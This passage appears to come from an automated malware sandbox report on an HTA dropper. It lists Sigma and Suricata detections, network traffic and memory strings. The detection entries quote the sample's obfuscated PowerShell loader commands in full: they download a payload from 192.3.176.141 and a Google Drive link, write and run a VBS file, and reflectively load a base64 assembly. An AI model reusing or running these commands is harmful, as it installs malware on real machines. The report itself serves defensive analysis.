ICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline", ProcessId: 7264, ProcessName: csc.exe
        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4432, TargetFilename: C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS
        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" , ProcessId: 7336, ProcessName: wscript.exe
        Sigma detected: Dynamic CSharp Compile Artefact
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4432, TargetFilename: C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", CommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgI
        Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0T

        Data Obfuscation

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious location
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline", ProcessId: 7264, ProcessName: csc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-25T10:33:19.622000+020028587951A Network Trojan was detected192.168.2.449730192.3.176.14180TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: seethebestthingstobegoodwithhislifebestthigns.htaReversingLabs: Detection: 33%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
        Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1868717892.00000000079C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdba source: powershell.exe, 0000000B.00000002.1985039069.000000000058C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2016973665.0000000006DAD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000B.00000002.2016973665.0000000006D9B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2016689401.0000000006D72000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 0000000B.00000002.2016973665.0000000006D9B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: b.pdb= source: powershell.exe, 0000000B.00000002.2016973665.0000000006DAD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000B.00000002.1985039069.000000000058C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1868984820.0000000007A0B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2016973665.0000000006DAD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 0000000B.00000002.2016973665.0000000006D9B000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Suspicious execution chain found
        Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 192.3.176.141:80
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 192.3.176.141 192.3.176.141
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global trafficHTTP traffic detected: GET /36/goodthingswithgreatcomebackwithgreatthigns.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.176.141Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.141
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_048A4BB0 URLDownloadToFileW,1_2_048A4BB0
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /36/goodthingswithgreatcomebackwithgreatthigns.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.176.141Connection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
        Source: powershell.exe, 00000001.00000002.1985218848.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2003720720.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIF
        Source: powershell.exe, 00000001.00000002.2003720720.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.141/36/goodthingswithgreatcomebackwithgreatthigns.tIFC
        Source: powershell.exe, 00000001.00000002.2003720720.0000000007581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microY
        Source: powershell.exe, 0000000B.00000002.1988384568.0000000004B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
        Source: powershell.exe, 00000003.00000002.1864429563.000000000587A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
        Source: powershell.exe, 00000001.00000002.1998227914.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1866713912.00000000061AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2004169236.00000000056FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000003.00000002.1864429563.0000000005297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000001.00000002.1985218848.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1864429563.0000000005141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2024894876.00000000051D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1988384568.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000003.00000002.1864429563.0000000005297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 0000000B.00000002.1988384568.00000000047E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000001.00000002.2003720720.00000000075DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: powershell.exe, 0000000B.00000002.2016973665.0000000006D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.K5
        Source: powershell.exe, 00000001.00000002.1985218848.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1864429563.0000000005141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2024894876.00000000051EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2024894876.00000000051F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1988384568.0000000004691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
        Source: powershell.exe, 00000003.00000002.1864429563.0000000005297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
